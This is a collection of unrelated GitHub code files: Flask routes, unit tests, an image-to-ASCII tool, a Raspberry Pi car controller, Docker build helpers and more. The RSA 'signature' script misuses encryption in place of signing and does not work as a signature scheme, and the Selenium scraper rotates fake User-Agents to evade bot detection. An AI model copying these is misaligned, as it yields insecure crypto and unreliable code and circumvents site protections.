session, abort, url_for\nfrom flask import Blueprint\nimport datetime\nfrom endpoints.utils import login_required, view, login_required_action\n\nfrom model.address import *\n\naddresses = Blueprint('addresses', __name__, url_prefix='/addresses')\n\n\n@addresses.route(\"/\", methods=[\"GET\"])\n@view\ndef getAddressesEnd(*args, **kwargs):\n address = getAllAddresses()\n if address is None:\n address = []\n return render_template(\"address/address.html\", addresses=address,**kwargs)\n\n\n@addresses.route(\"/\", methods=[\"GET\"])\n@view\ndef getAddressByIdEnd(id, *args, **kwargs):\n address = getAddressById(id)\n if address is None:\n return redirect(url_for(\"user.feed\"))\n else:\n return render_template(\"address/address.html\", addresses=address[0], **kwargs)\n\n\n@addresses.route(\"/create\", methods=[\"GET\", \"POST\"])\n@login_required\n@view\ndef createAddressEnd(*args, **kwargs):\n if request.method == \"GET\":\n return render_template(\"address/createAddress.html\", **kwargs)\n\n street_name = request.form[\"street_name\"]\n building_no = request.form[\"building_no\"]\n apartment_no = request.form[\"apartment_no\"]\n locality_name = request.form[\"locality_name\"]\n city = request.form[\"city\"]\n postcode = request.form[\"postcode\"]\n\n createAddress(street_name, building_no, apartment_no, locality_name, city, postcode)\n return redirect(url_for(\"addresses.getAddressesEnd\"))\n\n\n@addresses.route(\"/delete/\", methods=[\"GET\", \"POST\"])\n@login_required\n@view\ndef deleteAddressByIdEnd(id, *args, **kwargs):\n deleteAddress(id)\n return (url_for(\"addresses.getAddressesEnd\"))\n\n\n@addresses.route(\"/update/\", methods=[\"GET\", \"POST\"])\n@login_required\n@view\ndef updateAddressByIdEnd(id, *args, **kwargs):\n address = getAddressById(id)\n if request.method == \"GET\":\n if address is None:\n redirect(url_for(\"user.feed\"))\n else:\n return render_template(\"address/updateAddress.html\", address=address[0], **kwargs)\n\n street_name = request.form[\"street_name\"]\n building_no = request.form[\"building_no\"]\n apartment_no = request.form[\"apartment_no\"]\n locality_name = request.form[\"locality_name\"]\n city = request.form[\"city\"]\n postcode = request.form[\"postcode\"]\n\n updateAddres(id, street_name, building_no, apartment_no, locality_name, city, postcode)\n\n return redirect(url_for('addresses.getAddressesByIdEnd', id=id))\n","repo_name":"yasarbunyamin/itudatabase","sub_path":"endpoints/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25881336255","text":"try:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom marnadi import Route\nfrom marnadi.route import Routes\n\n\nclass RoutesTestCase(unittest.TestCase):\n\n def test_empty(self):\n routes = []\n self.assertListEqual([], Routes(routes))\n\n def test_single_route(self):\n route = Route('/')\n routes = [route]\n self.assertListEqual([route], Routes(routes))\n\n def test_two_routes(self):\n route = Route('/')\n routes = [route] * 2\n self.assertListEqual([route] * 2, Routes(routes))\n\n def test_sequence_of_routes(self):\n route = Route('/')\n routes = [[route] * 2]\n self.assertListEqual([route] * 2, Routes(routes))\n\n def test_two_sequences_of_routes(self):\n route = Route('/')\n routes = [[route] * 2] * 2\n self.assertListEqual([route] * 4, Routes(routes))\n\n def test_mixed_routes_and_sequences(self):\n route = Route('/')\n routes = [route] * 2 + [[route] * 2] * 2\n self.assertListEqual([route] * 6, Routes(routes))\n","repo_name":"renskiy/marnadi","sub_path":"tests/test_route.py","file_name":"test_route.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"10110600688","text":"import sys, os\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\n\r\nSIZE_WIDTH = 120\r\nSIZE_HEIGHT = 120\r\n\r\n\r\ndef _check_file_exists(filename):\r\n return os.path.exists(filename)\r\n\r\n\r\nclass Convertor:\r\n def __init__(self, filename):\r\n self.filename = filename\r\n\r\n if not _check_file_exists(self.filename):\r\n raise FileNotFoundError('could not found image named %s' %self.filename)\r\n self.image = Image.open(self.filename)\r\n self._to_shades() # terminal is black and white so converting the image to black and white\r\n\r\n def asarry(self):\r\n return np.asarray(self.image)\r\n \r\n def resize(self, height, width):\r\n self.image.thumbnail((height, width))\r\n\r\n def as_text(self):\r\n data = self.asarry()\r\n\r\n for pline in data:\r\n for pixel in pline:\r\n print(self._get_char_for(pixel), end=\"\")\r\n print()\r\n\r\n def _to_shades(self):\r\n self.image = self.image.convert('L')\r\n\r\n def _get_char_for(self, shade): # return char based on pixel shade\r\n if shade >= 230:\r\n return \"#\"\r\n \r\n if shade >= 200:\r\n return \"&\"\r\n \r\n if shade >= 170:\r\n return \"%\"\r\n \r\n if shade >= 140:\r\n return \"H\"\r\n \r\n if shade >= 100:\r\n return \"J\"\r\n \r\n if shade >= 60:\r\n return \"*\"\r\n \r\n if shade >= 30:\r\n return \"^\"\r\n return '.'\r\n\r\n\r\ndef main(image_name):\r\n converter = Convertor(image_name)\r\n converter.resize(SIZE_HEIGHT, SIZE_WIDTH)\r\n converter.as_text()\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) == 1:\r\n raise IndexError(\"Missing argument, image name\")\r\n filename = sys.argv[1]\r\n main(filename)\r\n","repo_name":"dsal3389/sandbox","sub_path":"python/image to chars/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17292214731","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 1 13:05:04 2019\n\n@author: swang\n\"\"\"\nclass sqlthefuk(object):\n \"\"\"\n \n sql helper to simplify the query generating process, which is a super \n painful work to do \n \"\"\"\n def __init__(self):\n self.query = \"\"\n \n def wrapit(self, item):\n # add left and right parenthesis\n return \"(\" + item + \")\"\n \n def select(self, columns, table, nested_mark=''):\n # select multiple columns\n if isinstance(columns, list):\n if not nested_mark:\n columns = ', '.join(columns)\n else:\n columns = ', '.join([nested_mark + '.' + c for c in columns])\n \n # select single column\n elif isinstance(columns, str):\n pass\n \n # se;ect all columns\n elif not columns:\n columns = '*'\n\n if not nested_mark:\n return \"select {} from {}\".format(columns, table)\n else:\n query = \"select {} from {} {}\".format(columns, table, nested_mark)\n return self.wrapit(qry)","repo_name":"songsong328/my_projects","sub_path":"sql_wrapper.py","file_name":"sql_wrapper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74402162435","text":"import rsa\nimport sys\nimport os\nfrom Cryptodome.Hash import SHA256\n\ndef hash_file(message_file):\n h = SHA256.new()\n with open(message_file, \"rb\") as f:\n while True:\n buf = f.read(1024)\n if len(buf) == 0:\n break\n h.update(buf)\n\n #print(\"Хеш файла: \" + str(h.hexdigest()))\n return h.digest() # возвращаем хеш в виде мссива байтов\n\n# запись электронной подписи в файл\ndef make_signature(message_file, key):\n \n # считаем хеш файла\n h = hash_file(message_file)\n\n # шифруем хеш закрытым ключом\n signature = rsa.encrypt(h, key)\n\n # записываем электронную подпись в файл\n signature_file_name = \"signature\"\n with open(signature_file_name, \"wb\") as f:\n f.write(signature)\n\n print(\"Электронная подпись сохранена в файле '{0}'\".format(signature_file_name))\n\n return signature_file_name\n\n# проверка электронной подписи\ndef check_signature(message_file, signature_file ,key):\n # считаем хеш файла с сообщением\n h1 = hash_file(message_file)\n\n # расшифровываем ЭП\n signature = None\n with open(signature_file, \"rb\") as f:\n signature = f.read()\n\n try:\n h2 = rsa.decrypt(signature, key)\n except rsa.pkcs1.DecryptionError:\n return False\n\n return (h1 == h2)\n\ndef main():\n try:\n message_file = sys.argv[1]\n except IndexError:\n print(\"Задайте файл с сообщением с помощью аргументов командной строки\")\n return\n\n if not os.path.exists(message_file):\n print(\"Файл не найден!\")\n return\n\n (privkey, pubkey) = rsa.newkeys(2048)\n signature_file = make_signature(message_file, privkey)\n filename = input(\"Введите имя файла с подписью:\")\n is_valid = check_signature(message_file, filename, pubkey)\n\n if is_valid:\n print(\"Электронная подпись корректна.\")\n else:\n print(\"Электронная подпись некорректна.\")\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"Dimama/BMSTU_SEM7","sub_path":"Information Security/Electronic Signature/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19340224646","text":"import pandas as pd\nimport numpy as np\nimport json\n\n\n\ndef user_case1(data, dic, col_name):\n \n for key, arr in dic.items():\n data = data[data[key].isin(arr)]\n \n value_counts = data[col_name].value_counts()\n \n ret1 = dict(zip(value_counts.index, value_counts.values))\n ret2 = dict(zip(value_counts.index, value_counts.values/len(data.index)))\n\n return ret1, ret2\n\n\n\n\ndef convert(o):\n if isinstance(o, np.int64): \n \treturn int(o) \n raise TypeError\n\n\ndef pieChart(dict, col, index):\n data = pd.read_csv(index)\n count, proportion = user_case1(data, dict,col)\n return json.dumps(count, default=convert)\n\n","repo_name":"Wutever/cs412_data_mining","sub_path":"user_case1.py","file_name":"user_case1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23446571581","text":"infile = \"a-large.in\"\r\noutfile = \"a-large.out\"\r\n\r\nlines = [l.strip() for l in open(infile,\"r\")]\r\nfrom collections import defaultdict, Counter\r\nfrom functools import partial\r\n\r\nnum_cases = int(lines[0])\r\nlines = lines[1:]\r\n\r\ncases = []\r\n\r\nfor _ in range(num_cases):\r\n \r\n N, X = map(int, lines[0].split())\r\n lines = lines[1:]\r\n sizes = map(int, lines[0].split())\r\n lines = lines[1:]\r\n \r\n case = N, X, sizes\r\n \r\n cases.append(case)\r\n \r\ndef process_case(case):\r\n \r\n n, x, sizes = case\r\n \r\n sizes.sort(reverse=True)\r\n #print n, x, sizes\r\n\r\n \r\n count = 0\r\n while True:\r\n if len(sizes) == 0:\r\n return count\r\n smallest = sizes.pop()\r\n #print smallest, sizes, count\r\n for i, size in enumerate(sizes):\r\n #print \"checking\", i, size\r\n if size + smallest <= x:\r\n matched = True\r\n sizes.pop(i)\r\n break\r\n \r\n count += 1\r\n\r\n return count\r\n \r\n \r\n return case\r\n\r\nwith open(outfile,\"w\") as g:\r\n \r\n for i, case in enumerate(cases):\r\n g.write(\"Case #\" + str(i + 1) + \": \" + str(process_case(case)) + \"\\n\")\r\n \r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_148/166.py","file_name":"166.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37452597150","text":"#!/usr/bin/python\n#coding=utf-8\nimport numpy\nimport cv2\nimport time\n\nfrom pid_controller import PID_Controller\nfrom driver import driver\nfrom line_detection import line_detection\nfrom cross_detect import detect_crossing\nfrom sign_detect import sign_detection\nfrom mser_detect import *\nfrom is_block import *\nfrom color_mark_detection import *\nCROSS_FLAGS = [2, 4]\n\n# move\nSTRAIGHT = (4,4)\nRIGHT_INPLACE = (-20, 20)\nLEFT_INPLACE = (20, -20)\n\nif __name__ == '__main__':\n # initialize video capture\n cap1 = cv2.VideoCapture(0)\n time1 = time.time()\n frame_cnt = 0\n fps = cap1.get(cv2.CAP_PROP_FPS)\n\n # objects\n controller = PID_Controller(0.02,0,0,-3,3)\n car = driver()\n cross_count = 0\n while True:\n _, frame1 = cap1.read()\n frame_cnt += 1\n ## if delay exceeds one frame, read until we get the newest frame\n #time2 = time.time()\n #delays = (time2-time1)*fps - frame_cnt\n #print(\"delays: {}\".format(delays))\n #while delays > 0:\n # _,frame1 = cap1.read()\n # frame_cnt += 1\n # time2 = time.time()\n # delays = (time2-time1)*fps - frame_cnt\n if frame_cnt % 30 == 29:\n print(\"Rest camera\")\n cap1.release()\n cap1 = cv2.VideoCapture(0)\n _, frame1 = cap1.read()\n \n # crossing detection\n if detect_crossing(img = frame1):\n cross_count += 1\n if 1 or cross_count in CROSS_FLAGS:\n # start turning right\n for i in range(40): \n car.set_speed(40, 40)\n _, frame1 = cap1.read()\n for i in range(60): \n car.set_speed(RIGHT_INPLACE[0], RIGHT_INPLACE[1])\n _, frame1 = cap1.read()\n continue\n # sign detection\n \n if (detect_block_color(frame1)):\n \n car.set_speed(0,0)\n cv2.imwrite('img_block/color_{}.png'.format(int(time.time())%100000), frame1)\n img,info=mser_image_processing(frame1)\n print(info)\n print(\"Rest camera\")\n cap1.release()\n cap1 = cv2.VideoCapture(0)\n _, frame1 = cap1.read()\n \n \n # if sign == ...:\n # ...\n # continue\n # elif sign == ...:\n # ...\n # continue\n # lane keep\n error = line_detection(frame1)\n # print('err = ',error)\n dv = controller.get_output(error)\n # print('dv = ', dv)\n car.set_speed((4-dv)*10, (4+dv)*10)\n\n","repo_name":"BPsoda/AU3506_raspberry_pi_car","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15879386319","text":"import unittest\n\nfrom view_layer_common import *\n\n\n# ############################################################\n# Testing\n# ############################################################\n\nclass UnitTesting(ViewLayerTesting):\n def test_view_layer_syncing(self):\n \"\"\"\n See if we can copy view layers.\n \"\"\"\n import bpy\n scene = bpy.context.scene\n view_layer = scene.view_layers.new(\"All\")\n\n self.assertEqual(len(view_layer.collections), 1)\n self.assertEqual(view_layer.collections[0].collection, scene.master_collection)\n\n self.assertEqual(\n {collection.name for collection in view_layer.collections[0].collections},\n {'Collection 1'})\n\n self.assertEqual(\n bpy.ops.outliner.collection_new(),\n {'FINISHED'})\n\n self.assertEqual(\n {collection.name for collection in view_layer.collections[0].collections},\n {'Collection 1', 'Collection 2'})\n\n\n# ############################################################\n# Main - Same For All Render Layer Tests\n# ############################################################\n\nif __name__ == '__main__':\n UnitTesting._extra_arguments = setup_extra_arguments(__file__)\n unittest.main()\n","repo_name":"blender/blender","sub_path":"tests/python/view_layer/test_collection_new_sync.py","file_name":"test_collection_new_sync.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"de","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"} +{"seq_id":"36548722241","text":"from flask import redirect, render_template, render_template_string, Blueprint\nfrom flask import request, url_for\nfrom flask_user import current_user, login_required, roles_accepted\nfrom app.init_app import app, db\nfrom app.models import UserProfileForm\n\n# The Home page is accessible to anyone\n@app.route('/')\ndef home_page():\n return render_template('test/test.html')\n\n\n# The User page is accessible to authenticated users (users that have logged in)\n@app.route('/user')\n@login_required # Limits access to authenticated users\ndef user_page():\n return render_template('pages/user_page.html')\n\n\n# The Admin page is accessible to users with the 'admin' role\n@app.route('/admin')\n@roles_accepted('admin') # Limits access to users with the 'admin' role\ndef admin_page():\n return render_template('pages/admin_page.html')\n\n\n@app.route('/pages/profile', methods=['GET', 'POST'])\n@login_required\ndef user_profile_page():\n # Initialize form\n form = UserProfileForm(request.form, current_user)\n\n # Process valid POST\n if request.method == 'POST' and form.validate():\n # Copy form fields to user_profile fields\n form.populate_obj(current_user)\n\n # Save user_profile\n db.session.commit()\n\n # Redirect to home page\n return redirect(url_for('home_page'))\n\n # Process GET or invalid POST\n return render_template('pages/user_profile_page.html',\n form=form)\n\n\nUPLOAD_FOLDER = '/home/himanshu/SIH/web/images'\n# from PIL import Image\n# from io import BytesIO\n# import base64\nimport json\nimport time\nimport base64\n@app.route('/test1', methods=['GET', 'POST'])\ndef test():\n try:\n a = request.form\n filename = str(int(time.time())) + '.png'\n filepath = UPLOAD_FOLDER + '/' + filename\n img_data = a['img_data'].split(',')[1]\n\n with open(filepath, \"wb\") as fh:\n fh.write(base64.b64decode(img_data))\n return json.dumps({\"success\": True})\n except: \n return json.dumps({\"success\": False})\n\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nfrom flask import send_from_directory\nimport os\nfrom werkzeug.utils import secure_filename\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n@app.route('/test', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user dones not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flask('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # return redirect(url_for('uploaded_file', filename=filename))\n return render_template_string('uploaded')\n return render_template('test/test.html')","repo_name":"mohit4/dermaScan","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31829969906","text":"'''\n@Author: Pavan Nakate\n@Date: 2021-11-12 10:32\n@Last Modified by: Pavan Nakate\n@Last Modified time: None\n@Title : DifferentDataTypeTuple \n'''\ndef different_datatype():\n \"\"\"\n Description:\n This Function create a tuple with different data-type and print it \n Parameter:\n None\n Return:\n None\n \"\"\"\n try:\n # different data-type Tuple \n type_tuple = (1,2.3,'A',\"Hello\",True)\n print(\"Tuple with different data-type : \",type_tuple)\n \n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n different_datatype()\n","repo_name":"Pavan699/Data-Structures","sub_path":"Tuples/DifferentDataTypeTuple.py","file_name":"DifferentDataTypeTuple.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14430364025","text":"import numpy as np\nimport torch\n\ndef _t2n(x):\n return x.detach().cpu().numpy()\n\nclass Driver(object):\n def __init__(self, config, client=None):\n\n self.all_args = config['all_args']\n self.envs = config['envs']\n self.eval_envs = config['eval_envs']\n self.device = config['device']\n self.num_agents = config['num_agents']\n if 'signal' in config:\n self.actor_id = config['signal'].actor_id\n self.weight_ids = config['signal'].weight_ids\n else:\n self.actor_id = 0\n self.weight_ids = [0]\n\n # parameters\n self.env_name = self.all_args.env_name\n self.algorithm_name = self.all_args.algorithm_name\n self.experiment_name = self.all_args.experiment_name\n self.use_centralized_V = self.all_args.use_centralized_V\n self.use_obs_instead_of_state = self.all_args.use_obs_instead_of_state\n self.num_env_steps = self.all_args.num_env_steps if hasattr(self.all_args,'num_env_steps') else self.all_args.eval_num\n\n self.episode_length = self.all_args.episode_length\n self.n_rollout_threads = self.all_args.n_rollout_threads\n self.learner_n_rollout_threads = self.all_args.n_rollout_threads\n\n self.n_eval_rollout_threads = self.all_args.n_eval_rollout_threads\n self.hidden_size = self.all_args.hidden_size\n self.recurrent_N = self.all_args.recurrent_N\n\n # interval\n self.save_interval = self.all_args.save_interval\n self.use_eval = self.all_args.use_eval\n self.eval_interval = self.all_args.eval_interval\n self.log_interval = self.all_args.log_interval\n\n # dir\n self.model_dir = self.all_args.model_dir\n\n\n\n if self.algorithm_name == \"rmappo\":\n from tmarl.algorithms.r_mappo_distributed.mappo_algorithm import MAPPOAlgorithm as TrainAlgo\n from tmarl.algorithms.r_mappo_distributed.mappo_module import MAPPOModule as AlgoModule\n else:\n raise NotImplementedError\n\n if self.envs:\n share_observation_space = self.envs.share_observation_space[0] \\\n if self.use_centralized_V else self.envs.observation_space[0]\n # policy network\n self.algo_module = AlgoModule(self.all_args,\n self.envs.observation_space[0],\n share_observation_space,\n self.envs.action_space[0],\n device=self.device)\n\n else:\n share_observation_space = self.eval_envs.share_observation_space[0] \\\n if self.use_centralized_V else self.eval_envs.observation_space[0]\n # policy network\n self.algo_module = AlgoModule(self.all_args,\n self.eval_envs.observation_space[0],\n share_observation_space,\n self.eval_envs.action_space[0],\n device=self.device)\n\n if self.model_dir is not None:\n self.restore()\n\n # algorithm\n self.trainer = TrainAlgo(self.all_args, self.algo_module, device=self.device)\n\n\n # buffer\n from tmarl.replay_buffers.normal.shared_buffer import SharedReplayBuffer\n\n self.buffer = SharedReplayBuffer(self.all_args,\n self.num_agents,\n self.envs.observation_space[0] if self.envs else self.eval_envs.observation_space[0],\n share_observation_space,\n self.envs.action_space[0] if self.envs else self.eval_envs.action_space[0])\n\n def run(self):\n raise NotImplementedError\n\n def warmup(self):\n raise NotImplementedError\n\n def collect(self, step):\n raise NotImplementedError\n\n def insert(self, data):\n raise NotImplementedError\n\n def restore(self):\n policy_actor_state_dict = torch.load(str(self.model_dir) + '/actor.pt', map_location=self.device)\n self.algo_module.actor.load_state_dict(policy_actor_state_dict)\n","repo_name":"TARTRL/TiKick","sub_path":"tmarl/drivers/shared_distributed/base_driver.py","file_name":"base_driver.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"61"} +{"seq_id":"18611608563","text":"import csv\nimport time\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# Inisialisasi webdriver Selenium\ndriver = webdriver.Chrome()\n\n# Daftar User-Agent yang berbeda\nuser_agents = [\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/89.0\",\n # Tambahkan User-Agent lain yang ingin Anda gunakan\n]\n\n# Fungsi untuk menghasilkan penundaan yang bervariasi\ndef random_delay():\n delay = random.uniform(1, 3) # Ganti dengan rentang penundaan yang diinginkan\n time.sleep(delay)\nloop = 0\n# Buka file CSV untuk menulis data\nwith open('./out.csv', 'a', newline='') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['key', 'value', 'img']) # Tulis header kolom\n\n # Loop melalui setiap barcode dalam file CSV\n with open('./pd.csv', 'r') as barcode_file:\n reader = csv.reader(barcode_file)\n \n # Lewati header baris pertama jika ada\n next(reader)\n \n # Loop melalui setiap baris dalam file CSV\n for row in reader:\n barcode = row[0] # Ambil nilai barcode dari kolom pertama\n nama = row[1] # Ambil nilai nama dari kolom kedua\n\n # Inisialisasi WebDriver Chrome\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\") # Jalankan dalam mode headless (tanpa tampilan browser)\n chrome_options.add_argument(f\"user-agent={random.choice(user_agents)}\") # Pilih secara acak User-Agent\n driver = webdriver.Chrome(options=chrome_options)\n\n # URL yang akan dibuka\n url = f'https://www.google.com/search?q={barcode} {nama}&tbm=isch'\n \n # Buka URL menggunakan webdriver\n driver.get(url)\n random_delay()\n\n # Tangkap layar dan simpan ke file\n screenshot_path = barcode + \".png\" # Tentukan path dan nama file untuk menyimpan screenshot\n driver.save_screenshot(screenshot_path)\n # Tulis data ke file CSV\n writer.writerow([barcode, nama, screenshot_path])\n loop +=1\n print(f\"{barcode}: Sukses - {loop} :: {screenshot_path}\")\n\n # Tutup webdriver setelah selesai mengambil gambar\n driver.quit()\n","repo_name":"nurramdandoni/scraping-data","sub_path":"scraping image produk/getImageAutoAgenDelayShot.py","file_name":"getImageAutoAgenDelayShot.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22730576976","text":"import os, sys\nmodd_str = os.path.abspath(os.path.dirname(__file__)) # module dir\n\nimport subprocess\nfrom colored import fg, bg, attr\n\nsys.path.append(\"%s/../../gf_core\"%(modd_str))\nimport gf_core_cli\n\nimport gf_os_docker\n\n#-------------------------------------------------------------\n# PULL\ndef pull(p_image__full_name_str,\n\tp_log_fun,\n\tp_docker_user_str = None,\n\tp_docker_pass_str = None,\n\tp_exit_on_fail_bool = True,\n\tp_docker_sudo_bool = False):\n\n\t# often times public containers are being pulled, so no login is needed for that and \n\t# callers dont submit their credentials.\n\tif not p_docker_pass_str == None and not p_docker_pass_str == \"\":\n\t\tgf_os_docker.login(p_docker_user_str,\n\t\t\tp_docker_pass_str,\n\t\t\tp_exit_on_fail_bool = True,\n\t\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n\t# DOCKER_PULL\n\tcmd_lst = []\n\tif p_docker_sudo_bool:\n\t\tcmd_lst.append(\"sudo\")\n\t\n\tcmd_lst.extend([\n\t\t\"docker pull\",\n\t\tp_image__full_name_str\n\t])\n\tc_pull = \" \".join(cmd_lst)\n\tp_log_fun(\"INFO\", \"cmd - %s\"%(c_pull))\n\n\tp = subprocess.Popen(c_pull,\n\t\tshell = True,\n\t\tstdout = subprocess.PIPE,\n\t\tbufsize = 1)\n\n\tfor line in p.stdout:\n\t\tclean_line_str = line.strip()\n\t\tprint(clean_line_str)\n\n\tif p_exit_on_fail_bool:\n\t\tif not p.returncode == None and not p.returncode == 0:\n\t\t\texit()\n\n#-------------------------------------------------------------\n# BUILD\ndef build(p_app_name_str,\n\tp_app_build_meta_map,\n\tp_log_fun,\n\tp_app_web_meta_map = None,\n\tp_user_name_str = \"local\",\n\tp_git_commit_hash_str = None,\n\tp_exit_on_fail_bool = False,\n\tp_docker_sudo_bool = False):\n\tp_log_fun(\"FUN_ENTER\", \"gf_containers.build()\")\n\tp_log_fun(\"INFO\", f\"p_app_name_str - {p_app_name_str}\")\n\tassert isinstance(p_app_name_str, str)\n\tassert isinstance(p_app_build_meta_map, dict)\n\n\t#------------------\n\t# META\n\n\tassert \"service_name_str\" in p_app_build_meta_map\n\tassert \"service_base_dir_str\" in p_app_build_meta_map\n\n\tservice_name_str = p_app_build_meta_map[\"service_name_str\"]\n\tservice_base_dir_str = p_app_build_meta_map[\"service_base_dir_str\"]\n\tassert os.path.isdir(service_base_dir_str)\n\n\t# service_dockerfile_path_str = \"%s/Dockerfile\"%(service_base_dir_str)\n\tservice_dockerfile_path_str = get_service_dockerfile(p_app_build_meta_map)\n\t\n\t#------------------\n\t# COPY_FILES_TO_DIR\n\tif \"copy_to_dir_lst\" in p_app_build_meta_map.keys():\n\t\tcopy_to_dir_lst = p_app_build_meta_map[\"copy_to_dir_lst\"]\n\t\tcopy_files(copy_to_dir_lst)\n\n\t#------------------\n\t# PREPARE_WEB_FILES\n\tif not p_app_web_meta_map == None:\n\t\tassert isinstance(p_app_web_meta_map, dict)\n\t\tassert \"pages_map\" in p_app_web_meta_map.keys()\n\t\tpages_map = p_app_web_meta_map[\"pages_map\"]\n\n\t\tprepare_web_files(pages_map,\n\t\t\tservice_base_dir_str,\n\t\t\tp_log_fun,\n\t\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n\t#------------------\n\t# IMAGE_FULL_NAMES\n\timage_name_str = service_name_str\n\timage_full_names_lst = get_image_full_names(image_name_str,\n\t\tp_app_build_meta_map,\n\t\tp_user_name_str,\n\t\tp_git_commit_hash_str = p_git_commit_hash_str)\n\n\t#------------------\n\t# BUILD_ARGS\n\tbuild_args_map = {}\n\n\t# BASE_IMAGE_TAG - tag of the base image from which the main image thats being\n\t# built from is inheriting from.\n\tif not p_git_commit_hash_str == None:\n\t\tbuild_args_map[\"GF_BASE_IMAGE_TAG\"] = p_git_commit_hash_str\n\telse:\n\t\tbuild_args_map[\"GF_BASE_IMAGE_TAG\"] = \"latest\"\n\t\n\t#------------------\n\t# DOCKER_BUILD\n\tgf_os_docker.build_image(image_full_names_lst,\n\t\tservice_dockerfile_path_str,\n\t\tp_log_fun,\n\t\tp_build_args_map = build_args_map,\n\t\tp_exit_on_fail_bool = p_exit_on_fail_bool,\n\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n\t#------------------\n\n#-------------------------------------------------------------\n# PUBLISH\ndef publish(p_app_name_str,\n\tp_app_build_meta_map,\n\tp_docker_user_str,\n\tp_docker_pass_str,\n\tp_log_fun,\n\tp_git_commit_hash_str = None,\n\tp_exit_on_fail_bool = False,\n\tp_docker_sudo_bool = False):\n\tp_log_fun(\"FUN_ENTER\", \"gf_containers.publish()\")\n\tp_log_fun(\"INFO\", \"p_app_name_str - %s\"%(p_app_name_str))\n\tassert isinstance(p_app_build_meta_map, dict)\n\n\tif \"service_name_str\" in p_app_build_meta_map.keys():\n\t\tservice_name_str = p_app_build_meta_map[\"service_name_str\"]\n\t\timage_name_str = service_name_str\n\telse:\n\t\timage_name_str = p_app_name_str\n\n\t# service_version_str = p_app_build_meta_map[\"version_str\"]\n\t#\n\t# image_tag_str = None\n\t# if not p_git_commit_hash_str == None:\n\t# \timage_tag_str = p_git_commit_hash_str\n\t# else:\n\t# \tservice_version_str = p_app_build_meta_map[\"version_str\"]\n\t# \timage_tag_str = service_version_str\n\n\timage_full_names_lst = get_image_full_names(image_name_str,\n\t\tp_app_build_meta_map,\n\t\tp_docker_user_str,\n\t\tp_git_commit_hash_str = p_git_commit_hash_str)\n\tassert isinstance(image_full_names_lst, list)\n\t\n\tfor image_full_name_str in image_full_names_lst:\n\t\t\n\t\t# DOCKER_PUSH\n\t\tgf_os_docker.push(image_full_name_str,\n\t\t\tp_docker_user_str,\n\t\t\tp_docker_pass_str,\n\t\t\tp_log_fun,\n\t\t\tp_exit_on_fail_bool = p_exit_on_fail_bool,\n\t\t\tp_docker_sudo_bool = 